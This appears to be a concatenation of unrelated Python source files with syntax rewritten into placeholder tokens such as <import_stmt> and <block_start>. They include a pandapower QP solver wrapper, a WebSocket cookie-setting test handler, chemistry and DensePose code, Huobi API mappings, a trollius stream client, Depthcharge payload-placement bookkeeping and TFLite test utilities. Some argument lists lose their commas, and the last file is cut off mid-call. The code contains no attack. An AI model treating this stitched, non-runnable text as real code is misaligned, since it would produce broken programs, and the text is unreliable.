# Use of this source code is governed by a BSD-style
# license that can be found in the LICENSE file.
"""Quadratic Program Solver for PYPOWER.
"""<import_stmt>sys<import_from_stmt>pandapower.pypower.qps_pips qps_pips<line_sep>#from pandapower.pypower.qps_ipopt import qps_ipopt
#from pandapower.pypower.qps_cplex import qps_cplex
#from pandapower.pypower.qps_mosek import qps_mosek
#from pandapower.pypower.qps_gurobi import qps_gurobi
<import_from_stmt>pandapower.pypower.util have_fcn<def_stmt>qps_pypower H c=<none> A=<none> l=<none> u=<none> xmin=<none> xmax=<none> x0=<none> opt=<none><block_start>"""Quadratic Program Solver for PYPOWER.
A common wrapper function for various QP solvers.
Solves the following QP (quadratic programming) problem::
min 1/2 x'*H*x + c'*x
x
subject to::
l <= A*x <= u (linear constraints)
xmin <= x <= xmax (variable bounds)
Inputs (all optional except C{H}, C{c}, C{A} and C{l}):
- C{H} : matrix (possibly sparse) of quadratic cost coefficients
- C{c} : vector of linear cost coefficients
- C{A, l, u} : define the optional linear constraints. Default
values for the elements of C{l} and C{u} are -Inf and Inf,
respectively.
- C{xmin}, C{xmax} : optional lower and upper bounds on the
C{x} variables, defaults are -Inf and Inf, respectively.
- C{x0} : optional starting value of optimization vector C{x}
- C{opt} : optional options structure with the following fields,
all of which are also optional (default values shown in parentheses)
- C{alg} (0) - determines which solver to use
- 0 = automatic, first available of BPMPD_MEX, CPLEX,
Gurobi, PIPS
- 100 = BPMPD_MEX
- 200 = PIPS, Python Interior Point Solver
pure Python implementation of a primal-dual
interior point method
- 250 = PIPS-sc, a step controlled variant of PIPS
- 300 = Optimization Toolbox, QUADPROG or LINPROG
- 400 = IPOPT
- 500 = CPLEX
- 600 = MOSEK
- 700 = Gurobi
- C{verbose} (0) - controls level of progress output displayed
- 0 = no progress output
- 1 = some progress output
- 2 = verbose progress output
- C{max_it} (0) - maximum number of iterations allowed
- 0 = use algorithm default
- C{bp_opt} - options vector for BP
- C{cplex_opt} - options dict for CPLEX
- C{grb_opt} - options dict for gurobipy
- C{ipopt_opt} - options dict for IPOPT
- C{pips_opt} - options dict for L{qps_pips}
- C{mosek_opt} - options dict for MOSEK
- C{ot_opt} - options dict for QUADPROG/LINPROG
- C{problem} : The inputs can alternatively be supplied in a single
C{problem} dict with fields corresponding to the input arguments
described above: C{H, c, A, l, u, xmin, xmax, x0, opt}
Outputs:
- C{x} : solution vector
- C{f} : final objective function value
- C{exitflag} : exit flag
- 1 = converged
- 0 or negative values = algorithm specific failure codes
- C{output} : output struct with the following fields:
- C{alg} - algorithm code of solver used
- (others) - algorithm specific fields
- C{lmbda} : dict containing the Langrange and Kuhn-Tucker
multipliers on the constraints, with fields:
- C{mu_l} - lower (left-hand) limit on linear constraints
- C{mu_u} - upper (right-hand) limit on linear constraints
- C{lower} - lower bound on optimization variables
- C{upper} - upper bound on optimization variables
Example from U{http://www.uc.edu/sashtml/iml/chap8/sect12.htm}:
>>> from numpy import array, zeros, Inf
>>> from scipy.sparse import csr_matrix
>>> H = csr_matrix(array([[1003.1, 4.3, 6.3, 5.9],
... [4.3, 2.2, 2.1, 3.9],
... [6.3, 2.1, 3.5, 4.8],
... [5.9, 3.9, 4.8, 10 ]]))
>>> c = zeros(4)
>>> A = csr_matrix(array([[1, 1, 1, 1 ],
... [0.17, 0.11, 0.10, 0.18]]))
>>> l = array([1, 0.10])
>>> u = array([1, Inf])
>>> xmin = zeros(4)
>>> xmax = None
>>> x0 = array([1, 0, 0, 1])
>>> solution = qps_pips(H, c, A, l, u, xmin, xmax, x0)
>>> round(solution["f"], 11) == 1.09666678128
True
>>> solution["converged"]
True
>>> solution["output"]["iterations"]
10
@author: <NAME> (PSERC Cornell)
"""<if_stmt>opt<is><none><block_start>opt={}<block_end># if x0 is None:
# x0 = array([])
# if xmax is None:
# xmax = array([])
# if xmin is None:
# xmin = array([])
## default options
<if_stmt>'alg'<in>opt<block_start>alg=opt['alg']<block_end><else_stmt><block_start>alg=0<block_end><if_stmt>'verbose'<in>opt<block_start>verbose=opt['verbose']<block_end><else_stmt><block_start>verbose=0<block_end>##----- call the appropriate solver -----
# if alg == 0 or alg == 200 or alg == 250: ## use MIPS or sc-MIPS
## set up options
<if_stmt>'pips_opt'<in>opt<block_start>pips_opt=opt['pips_opt']<block_end><else_stmt><block_start>pips_opt={}<block_end><if_stmt>'max_it'<in>opt<block_start>pips_opt['max_it']=opt['max_it']<block_end><if_stmt>alg<eq>200<block_start>pips_opt['step_control']=<false><block_end><else_stmt><block_start>pips_opt['step_control']=<true><block_end>pips_opt['verbose']=verbose<line_sep>## call solver
x,f,eflag,output,lmbda=qps_pips(H c A l u xmin xmax x0 pips_opt)<line_sep># elif alg == 400: ## use IPOPT
# x, f, eflag, output, lmbda = \
# qps_ipopt(H, c, A, l, u, xmin, xmax, x0, opt)
# elif alg == 500: ## use CPLEX
# x, f, eflag, output, lmbda = \
# qps_cplex(H, c, A, l, u, xmin, xmax, x0, opt)
# elif alg == 600: ## use MOSEK
# x, f, eflag, output, lmbda = \
# qps_mosek(H, c, A, l, u, xmin, xmax, x0, opt)
# elif 700: ## use Gurobi
# x, f, eflag, output, lmbda = \
# qps_gurobi(H, c, A, l, u, xmin, xmax, x0, opt)
# else:
# print('qps_pypower: {} is not a valid algorithm code\n'.format(alg))
<if_stmt>'alg'<not><in>output<block_start>output['alg']=alg<block_end><return>x f eflag output lmbda<block_end> |
<import_from_stmt>six.moves urllib<def_stmt>web_socket_do_extra_handshake request<block_start>url_parts=urllib.parse.urlsplit(request.uri)<line_sep>max_age=""<if_stmt>"clear"<in>url_parts.query<block_start>max_age="; Max-Age=0"<block_end>value="1"<if_stmt>"value"<in>url_parts.query<block_start>value=urllib.parse.parse_qs(url_parts.query)["value"][0]<block_end>cookies=["samesite-unspecified={}; Path=/".format(value)+max_age "samesite-lax={}; Path=/; SameSite=Lax".format(value)+max_age "samesite-strict={}; Path=/; SameSite=Strict".format(value)+max_age # SameSite=None cookies must be Secure.
"samesite-none={}; Path=/; SameSite=None; Secure".format(value)+max_age]<for_stmt>cookie cookies<block_start>request.extra_headers.append(("Set-Cookie" cookie))<block_end><block_end><def_stmt>web_socket_transfer_data request# Expect close() from user agent.
<block_start>request.ws_stream.receive_message()<block_end> |
<import_stmt>pytest<import_stmt>numpy<as>np<import_stmt>moldesign<as>mdt<import_from_stmt>moldesign units<as>u<import_from_stmt>moldesign.interfaces.pyscf_interface basis_values<import_from_stmt>.molecule_fixtures *<import_from_stmt>. helpers<line_sep>__PYTEST_MARK__='wfn'<line_sep>TESTSYSTEMS=['h2_rhf_augccpvdz' 'h2_rhf_sto3g' 'acetylene_dft_631g']<def_stmt>test_pyscf_orbital_grid_works h2_rhf_augccpvdz<block_start>""" Tests the basic input/output of the pyscf basis_values function
Doesn't actually test the values directly - just that the answers are mathematically consistent
"""<line_sep>mol=h2_rhf_augccpvdz<line_sep>wfn=mol.wfn<line_sep>nbasis=len(wfn.aobasis)<line_sep>coords=u.array([mol.com np.zeros(3)<times>u.angstrom 10.0<times>np.ones(3)<times>u.angstrom np.ones(3)<times>u.nm])<line_sep># First - check that the shape is appropriate if called without orbital coefficients
values_nocoeffs=basis_values(mol wfn.aobasis coords)<assert_stmt>values_nocoeffs.shape<eq>(len(coords) nbasis)<assert_stmt>(values_nocoeffs[-1]<eq>values_nocoeffs[-2]).all()# these 2 coordinates are the same
# Second - explicitly send orbital coefficients for first 2 basis functions
coeffs=np.zeros((2 nbasis))<line_sep>coeffs[:2 :2]=np.identity(2)<line_sep>vals_b0=basis_values(mol wfn.aobasis coords coeffs=coeffs)<assert_stmt>vals_b0.shape<eq>(len(coords) len(coeffs))<line_sep>np.testing.assert_allclose(values_nocoeffs[: :2] vals_b0)<line_sep># Third - send symmetric and anti-symmetric combinations of basis functions and check answers
plusminus=np.zeros((2 nbasis))<line_sep>plusminus[:2 :2]=1.0/np.sqrt(2)<line_sep>plusminus[1 1]=-1.0/np.sqrt(2)<line_sep>vals_plusminus=basis_values(mol wfn.aobasis coords coeffs=plusminus)<assert_stmt>vals_plusminus.shape<eq>(len(coords) len(coeffs))<line_sep>helpers.assert_almost_equal(vals_plusminus[: 0] (vals_b0[: 0]+vals_b0[: 1])/np.sqrt(2))<line_sep>helpers.assert_almost_equal(vals_plusminus[: 1] (vals_b0[: 0]-vals_b0[: 1])/np.sqrt(2))<block_end>@pytest.mark.parametrize('molkey' TESTSYSTEMS)<def_stmt>test_basis_function_3d_grids_same_in_pyscf_and_mdt molkey request<block_start>mol=request.getfixturevalue(molkey)<line_sep>randocoords=6.0<times>u.angstrom<times>(np.random.rand(200 3)-0.5)<line_sep>pyscf_vals=basis_values(mol mol.wfn.aobasis randocoords)<with_stmt>np.errstate(under='ignore')<block_start>mdt_vals=mol.wfn.aobasis(randocoords)<block_end>helpers.assert_almost_equal(mdt_vals pyscf_vals decimal=5)<block_end>@pytest.mark.parametrize('molkey' ['h2_rhf_augccpvdz' 'h2_rhf_sto3g'])@pytest.mark.screening<def_stmt>test_pyscf_basis_function_space_integral_normalized molkey request<block_start>mol=request.getfixturevalue(molkey)<line_sep>grid=mdt.mathutils.padded_grid(mol.positions 8.0<times>u.angstrom npoints=150)<line_sep>points=grid.allpoints()<line_sep>pyscf_vals=basis_values(mol mol.wfn.aobasis points)<assert_stmt>pyscf_vals.shape<eq>(len(points) len(mol.wfn.aobasis))<line_sep>pyscf_normsqr=(pyscf_vals<power>2).sum(axis=0)<times>grid.dx<times>grid.dy<times>grid.dz<line_sep>helpers.assert_almost_equal(pyscf_normsqr 1.0 decimal=4)<block_end> |
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
<import_stmt>matplotlib.pyplot<as>plt<import_stmt>seaborn<import_from_stmt>bezier _plot_helpers<import_from_stmt>tests.functional test_triangle_locate<import_from_stmt>tests.functional utils<def_stmt>make_plot triangle_index point_index save_plot<block_start>triangle=test_triangle_locate.TRIANGLES[triangle_index]<line_sep>point=test_triangle_locate.POINTS[: [point_index]]<line_sep>name=f"test_triangle{triangle_index}_and_point{point_index}"<line_sep>ax=triangle.plot(64)<line_sep>ax.plot(point[0 :] point[1 :] color="black" marker="o" linestyle="None")<line_sep>ax.axis("scaled")<line_sep>_plot_helpers.add_plot_boundary(ax)<if_stmt>save_plot<block_start>utils.save_fig(name)<block_end><else_stmt><block_start>plt.title(name.replace("_" r"\_"))<line_sep>plt.show()<block_end>plt.close(ax.figure)<block_end><def_stmt>main <block_start>parser=utils.get_parser()<line_sep>args=parser.parse_args()<for_stmt>case test_triangle_locate.CASES<block_start>triangle_index,point_index,_,_=case<line_sep>make_plot(triangle_index point_index args.save_plot)<block_end><block_end><if_stmt>__name__<eq>"__main__"<block_start>seaborn.set()# Required in `seaborn >= 0.8`
main()<block_end> |
# SPDX-License-Identifier: BSD-3-Clause
# Depthcharge: <https://github.com/nccgroup/depthcharge>
"""
Implements PayloadMap - Although technically "public" this module
isn't documented in the API because its utility is tightly coupled
to internals of the Depthcharge class.
"""<import_from_stmt>. log<import_from_stmt>. builtin_payloads<import_from_stmt>.operation Operation<def_stmt>_load_builtins arch payloads:list exclude:set<block_start>"""
Load built-in payloads into `payloads`, excluding any whose
names appear in the `exclude` set.
"""<for_stmt>attr dir(builtin_payloads)<block_start><if_stmt><not>isinstance(attr str)<or>attr.startswith('_')<block_start><continue><block_end><if_stmt>attr<in>exclude<block_start><continue><block_end>payload_dict=getattr(builtin_payloads attr)<try_stmt><block_start>payload=payload_dict[arch.name.lower()]<line_sep>payloads.append((attr payload))<block_end><except_stmt>KeyError<block_start>msg='Payload "{:s}" not implemented for {:s}'<line_sep>log.warning(msg.format(attr arch.name))<block_end><block_end><block_end><class_stmt>PayloadMap<block_start>"""
Tracks locations of deployed payloads.
The current implementation is simple and allocates space for all payloads,
even if they do not ultimately need to be deployed and used.
"""<def_stmt>__init__ self arch base:int **kwargs<block_start>self._base=base<line_sep>self._off=0<line_sep>self._map={}<line_sep>self._align=kwargs.get('align' 16)<line_sep>self._skip_deploy=kwargs.get('skip_deploy' <false>)<line_sep>exclude_builtins=kwargs.get('exclude_builtins' <false>)<line_sep>excluded=kwargs.get('exclude' set())<line_sep>payloads=[]<line_sep># Aggregate built-in payloads
<if_stmt><not>exclude_builtins<block_start>_load_builtins(arch payloads excluded)<block_end># Aggregate user-provided payloads
user_payloads=kwargs.get('payloads' <none>)<if_stmt>user_payloads<block_start>payloads<augadd>user_payloads<block_end># Assign each payload to its corresponding location
<for_stmt>payload payloads<block_start>self.insert(payload[0] payload[1])<block_end><block_end><def_stmt>insert self name:str payload:bytes required_by=<none><block_start>"""
Insert a `payload`, identified by `name`, into the PayloadMap.
This will assign it the next available address in the map.
If `required_by` is specified, the payload's association to an
:py:class:`depthcharge.Operation` subclass will be recorded. This
information can be provided later via :py:meth:`mark_required_by`.
Returns `True` if the payload added. If a payload with the same
name is already present, then `False` is returned. In this latter case,
The `required_by` information is still added to the corresponding
entry.
"""<if_stmt>name<not><in>self._map<block_start>address=self._base+self._off<line_sep>size=len(payload)<if_stmt>self._align<g>1<block_start>self._off<augadd>size+(self._align-1)<line_sep>self._off=(self._off<floordiv>self._align)<times>self._align<block_end><else_stmt><block_start>self._off<augadd>size<block_end>self._map[name]={'address':address 'deployed':<false> 'skip_deploy':self._skip_deploy 'data':payload 'size':size 'required_by':set()}<block_end><else_stmt><block_start>log.debug('{} is already in the PayloadMap'.format(name))<block_end><if_stmt>required_by<block_start>self.mark_required_by(name required_by)<block_end><block_end><def_stmt>__iter__ self<block_start><return>iter(self._map)<block_end><def_stmt>__getitem__ self name<block_start><try_stmt><block_start><return>self._map[name]<block_end><except_stmt>KeyError<block_start>msg='No such payload registered in PayloadMap: "{}"'.format(name)<line_sep><raise>KeyError(msg)<block_end><block_end>@property<def_stmt>base_address self<block_start>"""
This property specifies the base memory address at which payloads shall
be written to.
"""<line_sep><return>self._base<block_end><def_stmt>mark_deployed self name state=<true><block_start>"""
Mark the payload referred to by `name` as being deployed.
"""<line_sep>payload=self._map[name]<line_sep>payload['deployed']=state<block_end><def_stmt>mark_required_by self payload_name:str operation<block_start>"""
Mark the payload referred to by `name` as being required by
the specified `operation`, which may be the operation
name (str) or an instance of an Operation subclass.
A list of str or Operation instances is also permitted.
"""<if_stmt>isinstance(operation list)<block_start><for_stmt>op_entry operation<block_start>self.mark_required_by(payload_name op_entry)<block_end><return><block_end><if_stmt>isinstance(operation Operation)<block_start>operation=operation.name<block_end><elif_stmt><not>isinstance(operation str)<block_start>msg='Expected operation argument to be str, Operation, or list. Got {:s}'<line_sep><raise>TypeError(msg.format(type(operation).__name__))<block_end>self._map[payload_name]['required_by'].add(operation)<block_end><block_end> |
# !/usr/bin/python3
# -*- coding: utf-8 -*-
# @Author:梨花菜
# @File: relation.py
# @Time : 2019/5/27 10:16
# @Email: <EMAIL>
# @Software: PyCharm
# api模块和数据库api表relation对应关系
API_RELATION={"default":66 "energy.ball":67 "manage":68 "app_manage":68 "artisan":69 "goods":70 "member":71 "order":72 "seller":73 "payment":74 "martketing":75 "promotion":76 "purchase":77 "security":78 "logistics":79 "recycle":80 "image-search":81 "content":82 "bmpm":83 "bi":84}<line_sep># Java同学项目分组
API_AUTHOR={"default":1 "tangzhu":85 "xuqirong":86 "zhanghengjian":87 "fengzhenwen":88 "lingyunlong":89 "chencanzhang":90}<line_sep>NIL='无参数'<line_sep>SIGN='time,rode,sign'<line_sep>SIGN_OR_TOKEN=SIGN+'(wb-token可选)'<line_sep>SIGN_AND_TOKEN=SIGN+',wb-token'<line_sep>SESSION='cookie: wb_sess:xxxxxx'<line_sep>COOKIE='cookie: wbiao.securityservice.tokenid:xxxx'<line_sep>API_AUTH={"0":["NIL" NIL] "1":["APP_GENERAL_AUTH" SIGN] "2":["WXMP_GENERAL_AUTH" SIGN] "3":["APP_MEMBER_AUTH" SIGN_AND_TOKEN] "4":["APP_MEMBER_COMPATIBILITY_AUTH" SIGN_OR_TOKEN] "5":["WXMP_MEMBER_AUTH" SIGN_AND_TOKEN] "6":["WXMP_MEMBER_COMPATIBILITY_AUTH" SIGN_OR_TOKEN] "7":["APP_USER_AUTH" SIGN_AND_TOKEN] "8":["APP_USER_COMPATIBILITY_AUTH" SIGN_OR_TOKEN] "9":["WXMP_USER_AUTH" SIGN_AND_TOKEN] "10":["WXMP_USER_COMPATIBILITY_AUTH" SIGN_OR_TOKEN] "11":["WXMP_MEMBER_COMPATIBILITY_AUTH" SESSION] "12":["PM_USER_AUTH" COOKIE] "13":["BACK_USER_AUTH" COOKIE] "14":["APP_NIL" NIL] "15":["WXMP_NIL" NIL] "16":["PM_NIL" NIL] }<line_sep> |
<import_from_stmt>huobi.client.generic GenericClient<import_from_stmt>huobi.utils *<line_sep>generic_client=GenericClient()<line_sep>list_obj=generic_client.get_exchange_info()<line_sep>LogInfo.output("---- Supported symbols ----")<for_stmt>symbol list_obj.symbol_list<block_start>LogInfo.output(symbol.symbol)<block_end>LogInfo.output("---- Supported currencies ----")<for_stmt>currency list_obj.currencies<block_start>LogInfo.output(currency)<block_end> |
"""Like source.py, but uses streams."""<import_from_future_stmt> print_function<import_stmt>argparse<import_stmt>sys<import_from_stmt>trollius *<import_from_stmt>trollius test_utils<line_sep>ARGS=argparse.ArgumentParser(description="TCP data sink example.")<line_sep>ARGS.add_argument('--tls' action='store_true' dest='tls' default=<false> help='Use TLS')<line_sep>ARGS.add_argument('--iocp' action='store_true' dest='iocp' default=<false> help='Use IOCP event loop (Windows only)')<line_sep>ARGS.add_argument('--stop' action='store_true' dest='stop' default=<false> help='Stop the server by sending it b"stop" as data')<line_sep>ARGS.add_argument('--host' action='store' dest='host' default='127.0.0.1' help='Host name')<line_sep>ARGS.add_argument('--port' action='store' dest='port' default=1111 type=int help='Port number')<line_sep>ARGS.add_argument('--size' action='store' dest='size' default=16<times>1024 type=int help='Data size')<class_stmt>Debug<block_start>"""A clever little class that suppresses repetitive messages."""<line_sep>overwriting=<false><line_sep>label='stream1:'<def_stmt>print_ self *args<block_start><if_stmt>self.overwriting<block_start>print(file=sys.stderr)<line_sep>self.overwriting=0<block_end>print(self.label *args file=sys.stderr)<block_end><def_stmt>oprint self *args<block_start>self.overwriting<augadd>1<line_sep>end='\n'<if_stmt>self.overwriting<ge>3<block_start><if_stmt>self.overwriting<eq>3<block_start>print(self.label '[...]' file=sys.stderr)<block_end>end='\r'<block_end>print(self.label *args file=sys.stderr end=end)<line_sep>sys.stdout.flush()<block_end><block_end>@coroutine<def_stmt>start loop args<block_start>d=Debug()<line_sep>total=0<line_sep>sslctx=<none><if_stmt>args.tls<block_start>d.print_('using dummy SSLContext')<line_sep>sslctx=test_utils.dummy_ssl_context()<block_end>r,w=<yield>From(open_connection(args.host args.port ssl=sslctx))<line_sep>d.print_('r =' r)<line_sep>d.print_('w =' w)<if_stmt>args.stop<block_start>w.write(b'stop')<line_sep>w.close()<block_end><else_stmt><block_start>size=args.size<line_sep>data=b'x'<times>size<try_stmt><block_start><while_stmt><true><block_start>total<augadd>size<line_sep>d.oprint('writing' size 'bytes; total' total)<line_sep>w.write(data)<line_sep>f=w.drain()<if_stmt>f<block_start>d.print_('pausing')<line_sep><yield>From(f)<block_end><block_end><block_end><except_stmt>(ConnectionResetError BrokenPipeError)<as>exc<block_start>d.print_('caught' repr(exc))<block_end><block_end><block_end><def_stmt>main <block_start><global>args<line_sep>args=ARGS.parse_args()<if_stmt>args.iocp<block_start><import_from_stmt>trollius.windows_events ProactorEventLoop<line_sep>loop=ProactorEventLoop()<line_sep>set_event_loop(loop)<block_end><else_stmt><block_start>loop=get_event_loop()<block_end><try_stmt><block_start>loop.run_until_complete(start(loop args))<block_end><finally_stmt><block_start>loop.close()<block_end><block_end><if_stmt>__name__<eq>'__main__'<block_start>main()<block_end> |
# Copyright (c) Facebook, Inc. and its affiliates.
<import_stmt>random<import_from_stmt>typing Optional Tuple<import_stmt>torch<import_from_stmt>densepose.converters ToChartResultConverterWithConfidences<import_from_stmt>.densepose_base DensePoseBaseSampler<class_stmt>DensePoseConfidenceBasedSampler(DensePoseBaseSampler)<block_start>"""
Samples DensePose data from DensePose predictions.
Samples for each class are drawn using confidence value estimates.
"""<def_stmt>__init__ self confidence_channel:str count_per_class:int=8 search_count_multiplier:Optional[float]=<none> search_proportion:Optional[float]=<none> <block_start>"""
Constructor
Args:
confidence_channel (str): confidence channel to use for sampling;
possible values:
"sigma_2": confidences for UV values
"fine_segm_confidence": confidences for fine segmentation
"coarse_segm_confidence": confidences for coarse segmentation
(default: "sigma_2")
count_per_class (int): the sampler produces at most `count_per_class`
samples for each category (default: 8)
search_count_multiplier (float or None): if not None, the total number
of the most confident estimates of a given class to consider is
defined as `min(search_count_multiplier * count_per_class, N)`,
where `N` is the total number of estimates of the class; cannot be
specified together with `search_proportion` (default: None)
search_proportion (float or None): if not None, the total number of the
of the most confident estimates of a given class to consider is
defined as `min(max(search_proportion * N, count_per_class), N)`,
where `N` is the total number of estimates of the class; cannot be
specified together with `search_count_multiplier` (default: None)
"""<line_sep>super().__init__(count_per_class)<line_sep>self.confidence_channel=confidence_channel<line_sep>self.search_count_multiplier=search_count_multiplier<line_sep>self.search_proportion=search_proportion<assert_stmt>(search_count_multiplier<is><none>)<or>(search_proportion<is><none>) (f"Cannot specify both search_count_multiplier (={search_count_multiplier})"<concat>f"and search_proportion (={search_proportion})")<block_end><def_stmt>_produce_index_sample self values:torch.Tensor count:int<block_start>"""
Produce a sample of indices to select data based on confidences
Args:
values (torch.Tensor): an array of size [n, k] that contains
estimated values (U, V, confidences);
n: number of channels (U, V, confidences)
k: number of points labeled with part_id
count (int): number of samples to produce, should be positive and <= k
Return:
list(int): indices of values (along axis 1) selected as a sample
"""<line_sep>k=values.shape[1]<if_stmt>k<eq>count<block_start>index_sample=list(range(k))<block_end><else_stmt># take the best count * search_count_multiplier pixels,
# sample from them uniformly
# (here best = smallest variance)
<block_start>_,sorted_confidence_indices=torch.sort(values[2])<if_stmt>self.search_count_multiplier<is><not><none><block_start>search_count=min(int(count<times>self.search_count_multiplier) k)<block_end><elif_stmt>self.search_proportion<is><not><none><block_start>search_count=min(max(int(k<times>self.search_proportion) count) k)<block_end><else_stmt><block_start>search_count=min(count k)<block_end>sample_from_top=random.sample(range(search_count) count)<line_sep>index_sample=sorted_confidence_indices[:search_count][sample_from_top]<block_end><return>index_sample<block_end><def_stmt>_produce_labels_and_results self instance<arrow>Tuple[torch.Tensor torch.Tensor]<block_start>"""
Method to get labels and DensePose results from an instance, with confidences
Args:
instance (Instances): an instance of `DensePoseChartPredictorOutputWithConfidences`
Return:
labels (torch.Tensor): shape [H, W], DensePose segmentation labels
dp_result (torch.Tensor): shape [3, H, W], DensePose results u and v
stacked with the confidence channel
"""<line_sep>converter=ToChartResultConverterWithConfidences<line_sep>chart_result=converter.convert(instance.pred_densepose instance.pred_boxes)<line_sep>labels,dp_result=chart_result.labels.cpu() chart_result.uv.cpu()<line_sep>dp_result=torch.cat((dp_result getattr(chart_result self.confidence_channel)[<none>].cpu()))<line_sep><return>labels dp_result<block_end><block_end> |
<import_stmt>pickle<import_stmt>supriya<def_stmt>test_01 <block_start>old_session=supriya.Session()<line_sep>new_session=pickle.loads(pickle.dumps(old_session))<line_sep>old_bundles=old_session.to_osc_bundles()<line_sep>new_bundles=new_session.to_osc_bundles()<assert_stmt>old_bundles<eq>new_bundles<block_end><def_stmt>test_02 <block_start>old_session=supriya.Session()<line_sep>group=old_session.add_group(offset=5)<line_sep>group.add_synth(offset=10 duration=10)<line_sep>new_session=pickle.loads(pickle.dumps(old_session))<line_sep>old_bundles=old_session.to_osc_bundles()<line_sep>new_bundles=new_session.to_osc_bundles()<assert_stmt>old_bundles<eq>new_bundles<block_end> |
# Copyright 2020 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Utility functions that support testing.
All functions that can be commonly used by various tests.
"""<import_stmt>flatbuffers<import_from_stmt>tensorflow.lite.python schema_py_generated<as>schema_fb<line_sep>TFLITE_SCHEMA_VERSION=3<def_stmt>build_mock_flatbuffer_model <block_start>"""Creates a flatbuffer containing an example model."""<line_sep>builder=flatbuffers.Builder(1024)<line_sep>schema_fb.BufferStart(builder)<line_sep>buffer0_offset=schema_fb.BufferEnd(builder)<line_sep>schema_fb.BufferStartDataVector(builder 10)<line_sep>builder.PrependUint8(9)<line_sep>builder.PrependUint8(8)<line_sep>builder.PrependUint8(7)<line_sep>builder.PrependUint8(6)<line_sep>builder.PrependUint8(5)<line_sep>builder.PrependUint8(4)<line_sep>builder.PrependUint8(3)<line_sep>builder.PrependUint8(2)<line_sep>builder.PrependUint8(1)<line_sep>builder.PrependUint8(0)<line_sep>buffer1_data_offset=builder.EndVector(10)<line_sep>schema_fb.BufferStart(builder)<line_sep>schema_fb.BufferAddData(builder buffer1_data_offset)<line_sep>buffer1_offset=schema_fb.BufferEnd(builder)<line_sep>schema_fb.BufferStart(builder)<line_sep>buffer2_offset=schema_fb.BufferEnd(builder)<line_sep>schema_fb.ModelStartBuffersVector(builder 3)<line_sep>builder.PrependUOffsetTRelative(buffer2_offset)<line_sep>builder.PrependUOffsetTRelative(buffer1_offset)<line_sep>builder.PrependUOffsetTRelative(buffer0_offset)<line_sep>buffers_offset=builder.EndVector(3)<line_sep>string0_offset=builder.CreateString('input_tensor')<line_sep>schema_fb.TensorStartShapeVector(builder 3)<line_sep>builder.PrependInt32(1)<line_sep>builder.PrependInt32(2)<line_sep>builder.PrependInt32(5)<line_sep>shape0_offset=builder.EndVector(3)<line_sep>schema_fb.TensorStart(builder)<line_sep>schema_fb.TensorAddName(builder string0_offset)<line_sep>schema_fb.TensorAddShape(builder shape0_offset)<line_sep>schema_fb.TensorAddType(builder 0)<line_sep>schema_fb.TensorAddBuffer(builder 0)<line_sep>tensor0_offset=schema_fb.TensorEnd(builder)<line_sep>schema_fb.QuantizationParametersStartMinVector(builder 5)<line_sep>builder.PrependFloat32(0.5)<line_sep>builder.PrependFloat32(2.0)<line_sep>builder.PrependFloat32(5.0)<line_sep>builder.PrependFloat32(10.0)<line_sep>builder.PrependFloat32(20.0)<line_sep>quant1_min_offset=builder.EndVector(5)<line_sep>schema_fb.QuantizationParametersStartMaxVector(builder 5)<line_sep>builder.PrependFloat32(10.0)<line_sep>builder.PrependFloat32(20.0)<line_sep>builder.PrependFloat32(-50.0)<line_sep>builder.PrependFloat32(1.0)<line_sep>builder.PrependFloat32(2.0)<line_sep>quant1_max_offset=builder.EndVector(5)<line_sep>schema_fb.QuantizationParametersStartScaleVector(builder 5)<line_sep>builder.PrependFloat32(3.0)<line_sep>builder.PrependFloat32(4.0)<line_sep>builder.PrependFloat32(5.0)<line_sep>builder.PrependFloat32(6.0)<line_sep>builder.PrependFloat32(7.0)<line_sep>quant1_scale_offset=builder.EndVector(5)<line_sep>schema_fb.QuantizationParametersStartZeroPointVector(builder 5)<line_sep>builder.PrependInt64(1)<line_sep>builder.PrependInt64(2)<line_sep>builder.PrependInt64(3)<line_sep>builder.PrependInt64(-1)<line_sep>builder.PrependInt64(-2)<line_sep>quant1_zero_point_offset=builder.EndVector(5)<line_sep>schema_fb.QuantizationParametersStart(builder)<line_sep>schema_fb.QuantizationParametersAddMin(builder quant1_min_offset)<line_sep>schema_fb.QuantizationParametersAddMax(builder quant1_max_offset)<line_sep>schema_fb.QuantizationParametersAddScale(builder quant1_scale_offset)<line_sep>schema_fb.QuantizationParametersAddZeroPoint(builder quant1_zero_point_offset)<line_sep>quantization1_offset=schema_fb.QuantizationParametersEnd(builder)<line_sep>string1_offset=builder.CreateString('constant_tensor')<line_sep>schema_fb.TensorStartShapeVector(builder 3)<line_sep>builder.PrependInt32(1)<line_sep>builder.PrependInt32(2)<line_sep>builder.PrependInt32(5)<line_sep>shape1_offset=builder.EndVector(3)<line_sep>schema_fb.TensorStart(builder)<line_sep>schema_fb.TensorAddName(builder string1_offset)<line_sep>schema_fb.TensorAddShape(builder shape1_offset)<line_sep>schema_fb.TensorAddType(builder 0)<line_sep>schema_fb.TensorAddBuffer(builder 1)<line_sep>schema_fb.TensorAddQuantization(builder quantization1_offset)<line_sep>tensor1_offset=schema_fb.TensorEnd(builder)<line_sep>string2_offset=builder.CreateString('output_tensor')<line_sep>schema_fb.TensorStartShapeVector(builder 3)<line_sep>builder.PrependInt32(1)<line_sep>builder.PrependInt32(2)<line_sep>builder.PrependInt32(5)<line_sep>shape2_offset=builder.EndVector(3)<line_sep>schema_fb.TensorStart(builder)<line_sep>schema_fb.TensorAddName(builder string2_offset)<line_sep>schema_fb.TensorAddShape(builder shape2_offset)<line_sep>schema_fb.TensorAddType(builder 0)<line_sep>schema_fb.TensorAddBuffer(builder 2)<line_sep>tensor2_offset=schema_fb.TensorEnd(builder)<line_sep>schema_fb.SubGraphStartTensorsVector(builder 